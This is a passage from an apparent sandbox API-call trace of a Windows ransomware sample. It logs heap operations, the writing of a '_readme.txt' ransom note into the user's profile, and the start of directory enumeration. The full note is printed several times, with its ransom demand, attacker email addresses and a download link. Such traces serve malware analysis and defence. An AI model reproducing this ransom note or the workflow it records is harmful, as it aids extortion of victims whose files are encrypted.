(HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0175.447] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.447] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0175.447] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.447] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0175.448] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.448] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0175.448] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.448] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.449] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.449] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0175.449] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.449] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.449] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0175.450] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.450] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0175.450] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.450] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0175.451] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.451] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0175.451] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.451] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.452] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.452] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0175.452] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.452] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.452] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.452] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0175.452] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.452] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.453] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.453] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.453] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0175.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.453] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0175.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0175.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0175.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0175.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0175.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0175.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.457] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0175.457] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.457] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.457] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0175.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0175.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0175.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0175.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0175.460] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0175.460] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0175.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.460] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.460] PathFindFileNameW (pszPath="") returned="" [0175.460] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0175.461] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0175.461] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0175.461] FreeLibrary (hLibModule=0x759d0000) returned 1 [0175.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0175.461] PathAppendW (in: pszPath="C:\\Users\\kEecfMwgj\\", pMore="_readme.txt" | out: pszPath="C:\\Users\\kEecfMwgj\\_readme.txt") returned 1 [0175.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0175.461] PathFileExistsW (pszPath="C:\\Users\\kEecfMwgj\\_readme.txt") returned 0 [0175.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d30670 [0175.461] lstrcpyW (in: lpString1=0x2d30670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0175.461] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0175.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.462] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\_readme.txt" (normalized: "c:\\users\\keecfmwgj\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x580 [0175.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8c0) returned 0x2d38378 [0175.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x85c) returned 0x2d2f4c0 [0175.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2f4c0, cbMultiByte=2140, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 1117 [0175.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x860) returned 0x2d38c40 [0175.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2f4c0 | out: hHeap=0x6a0000) returned 1 [0175.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38378 | out: hHeap=0x6a0000) returned 1 [0175.463] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned 1116 [0175.463] WriteFile (in: hFile=0x580, lpBuffer=0x2d38c40*, nNumberOfBytesToWrite=0x45c, lpNumberOfBytesWritten=0x30ffb64, lpOverlapped=0x0 | out: lpBuffer=0x2d38c40*, lpNumberOfBytesWritten=0x30ffb64*=0x45c, lpOverlapped=0x0) returned 1 [0175.465] CloseHandle (hObject=0x580) returned 1 [0175.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38c40 | out: hHeap=0x6a0000) returned 1 [0175.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30670 | out: hHeap=0x6a0000) returned 1 [0175.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0175.466] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\*" (normalized: "c:\\users\\keecfmwgj\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe140cf30, ftLastAccessTime.dwHighDateTime=0x1d8a8ba, ftLastWriteTime.dwLowDateTime=0xe140cf30, ftLastWriteTime.dwHighDateTime=0x1d8a8ba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0175.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0175.466] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe140cf30, ftLastAccessTime.dwHighDateTime=0x1d8a8ba, ftLastWriteTime.dwLowDateTime=0xe140cf30, ftLastWriteTime.dwHighDateTime=0x1d8a8ba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.467] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0175.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f360 [0175.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27680 [0175.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f318 [0175.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f360 | out: hHeap=0x6a0000) returned 1 [0175.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.467] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d70450, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d70450, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d70450, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0175.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0175.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82850 [0175.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x38) returned 0x2cbfa50 [0175.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f318 | out: hHeap=0x6a0000) returned 1 [0175.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82850 | out: hHeap=0x6a0000) returned 1 [0175.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0175.468] FindNextFileW (in: hFindFile=0x2cbfa10, 